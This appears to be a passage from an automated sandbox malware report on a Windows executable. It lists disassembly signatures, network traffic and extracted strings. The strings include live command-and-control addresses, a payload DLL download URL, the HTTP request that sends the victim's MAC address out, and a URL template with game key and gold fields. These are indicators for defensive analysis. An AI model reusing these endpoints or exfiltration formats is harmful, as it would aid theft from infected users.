                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_0045AB63
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_004A0B71
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004A0B71
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004A0B71
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_0047CB06
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_0041CB09
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_004BAB25
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_004BAB25
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_00446B2B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_004B2BCA
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then add esp, 08h0_2_004A8BD4
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_0041ABE8
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0041ABE8
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-60h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-60h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-60h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-60h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-3Ch], esp0_2_00404C42
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-3Ch], esp0_2_00404C4C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-3Ch], esp0_2_00404C56
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-3Ch], esp0_2_00404C60
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then push edx0_2_0042EC66
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-3Ch], esp0_2_00404C24
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004C4C21
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004C4C21
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-3Ch], esp0_2_00404C2E
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-3Ch], esp0_2_00404C38
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00484C33
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00484C33
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-38h], esp0_2_00484C33
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00484C33
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00484C33
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00484C33
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-38h], esp0_2_00484C33
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00484C33
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00484C33
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-38h], esp0_2_00484C33
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00484C33
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00484C33
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_00484C33
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-38h], esp0_2_00484C33
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-38h], esp0_2_00484C33
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_004B4CE2
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_0046ECEB
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0040ECF1
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0040ECF1
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0040ECF1
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0040ECF1
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_00480CFD
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_00450C8D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_004BEC9B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_004B4C9A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_00448CB6
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_00470D4D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004B4D5C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004C8D69
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_00474D78
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004C4D06
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004C4D06
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_00482D34
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_004A0DC9
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004A0DC9
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004A0DC9
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_0046EDD5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_00450DD1
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_004A8DD6
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004B2E47
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp0_2_004B2E47
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0043EE51
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0043EE51
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004C8E01
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004C8E01
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_004C8E01
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426E31
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426E31
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426E31
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_004B4EF3
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_00456EF9
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_00456EF9
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_00456EF9
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_00456EF9
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_00456EF9
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp0_2_00456EF9
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_00456EF9
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_00456EF9
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_00456EF9
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_00456EF9

                    Networking

                    barindex
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49730
                    Source: global trafficTCP traffic: 192.168.2.4:49730 -> 43.226.78.44:8000
                    Source: global trafficTCP traffic: 192.168.2.4:63072 -> 1.1.1.1:53
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global trafficHTTP traffic detected: GET /8001.dll HTTP/1.1Accept: */*Referer: https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dllAccept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)Host: cesg1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /macweb/submit/ HTTP/1.1Accept: */*Referer: http://43.226.78.44:8000/macweb/submit/Accept-Language: zh-cnContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)Host: 43.226.78.44:8000Content-Length: 49Cache-Control: no-cacheData Raw: 63 68 61 6e 6e 65 6c 5f 6e 75 6d 62 65 72 3d 38 30 30 33 26 6d 61 63 5f 61 64 64 72 65 73 73 3d 45 43 3a 46 34 3a 42 42 3a 45 41 3a 31 35 3a 38 38 Data Ascii: channel_number=8003&mac_address=EC:F4:BB:EA:15:88
                    Source: unknownTCP traffic detected without corresponding DNS query: 43.226.78.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 43.226.78.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 43.226.78.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 43.226.78.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 43.226.78.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownTCP traffic detected without corresponding DNS query: 43.226.78.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 43.226.78.44
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 0_2_00404C1A InternetOpenA,InternetOpenA,InternetOpenA,InternetOpenA,InternetConnectA,InternetCloseHandle,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,InternetSetOptionA,HttpSendRequestA,HttpSendRequestA,InternetReadFile,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404C1A
                    Source: global trafficHTTP traffic detected: GET /8001.dll HTTP/1.1Accept: */*Referer: https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dllAccept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)Host: cesg1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: cesg1.oss-cn-beijing.aliyuncs.com
                    Source: unknownHTTP traffic detected: POST /macweb/submit/ HTTP/1.1Accept: */*Referer: http://43.226.78.44:8000/macweb/submit/Accept-Language: zh-cnContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)Host: 43.226.78.44:8000Content-Length: 49Cache-Control: no-cacheData Raw: 63 68 61 6e 6e 65 6c 5f 6e 75 6d 62 65 72 3d 38 30 30 33 26 6d 61 63 5f 61 64 64 72 65 73 73 3d 45 43 3a 46 34 3a 42 42 3a 45 41 3a 31 35 3a 38 38 Data Ascii: channel_number=8003&mac_address=EC:F4:BB:EA:15:88
                    Source: 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.drString found in binary or memory: http://.https
                    Source: 1734098836319.exe, 00000000.00000002.2952794089.00000000008E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://43.226.78.44:8000/macweb/submit/
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://43.226.78.44:8000/macweb/submit/&mac_address=channel_number=url
                    Source: 8001[1].dll.0.drString found in binary or memory: http://61.160.207.3:8003/api
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://bbs.dult.cn/thread-24328-1-1.html
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.pki.jemmylovejenny.tk/EVRootCA.crt0?
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA.crt0
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drString found in binary or memory: http://crl.certum.pl/ca.crl0h
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drString found in binary or memory: http://crl.certum.pl/l3.crl0a
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://crls.pki.jemmylovejenny.tk/EVRootCA.crl0
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://crls.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA.crl0
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://cs-g2-crl.thawte.com/ThawteCSG2.crl0
                    Source: 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://i.2.wen888.shop:4002/index/user.html
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://i.2.wen888.shop:4002/index/user.html&code=data&Game_Cient_Key_=&Game_St_=&Game_St_Key_=&gold=
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drString found in binary or memory: http://ocsp.certum.pl0.
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.pki.jemmylovejenny.tk/EVRootCA0=
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA0O
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.thawte.com0
                    Source: 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://pv.sohu.com/cityjson
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drString found in binary or memory: http://repository.certum.pl/ca.cer0:
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drString found in binary or memory: http://repository.certum.pl/ctnca.cer0
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drString found in binary or memory: http://repository.certum.pl/l3.cer0
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drString found in binary or memory: http://subca.ocsp-certum.com0.
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drString found in binary or memory: http://subca.ocsp-certum.com01
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drString found in binary or memory: http://www.certum.pl/CPS0
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.dult.cn/100.txt
                    Source: 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.eyuyan.com
                    Source: 1734098836319.exe, 8001[1].dll.0.drString found in binary or memory: http://www.eyuyan.com)DVarFileInfo$
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.eyuyan.comservice
                    Source: 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.drString found in binary or memory: https://Mozilla/4.0
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://User-Agent:Mozilla/4.0
                    Source: 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ip.sb/ip
                    Source: 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ttt.sh/ip/qqwry/
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ttt.sh/ip/qqwry/ip
                    Source: 1734098836319.exe, 00000000.00000002.2952794089.0000000000901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cesg1.oss-cn-beijing.aliyuncs.com/
                    Source: 1734098836319.exe, 00000000.00000002.2952794089.000000000089E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2952794089.0000000000901000.00000004.00000020.00020000.00000000.sdmp, submit[1].json.0.drString found in binary or memory: https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dll
                    Source: 1734098836319.exe, 00000000.00000002.2952794089.0000000000901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dllo
                    Source: 1734098836319.exe, 00000000.00000002.2952794089.00000000008E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cesg1.oss-cn-beijing.aliyuncs.com/;W
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://ip.cn/index.php
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://pki.jemmylovejenny.tk/cps0/
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://pki.jemmylovejenny.tk/rpa0
                    Source: 1734098836319.exe, 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.drString found in binary or memory: https://wwug.lanzouq.com/huohanqqq
                    Source: 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.drString found in binary or memory: https://wwug.lanzouq.com/huohanqqqQ.dll
                    Source: 1734098836319.exe, 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.drString found in binary or memory: https://wwug.lanzouq.com/huohansss
                    Source: 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.drString found in binary or memory: https://wwug.lanzouq.com/huohanssss.dll
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drString found in binary or memory: https://www.certum.pl/CPS0
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drString found in binary or memory: https://www.certum.pl/repository.0
                    Source: 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ip138.com
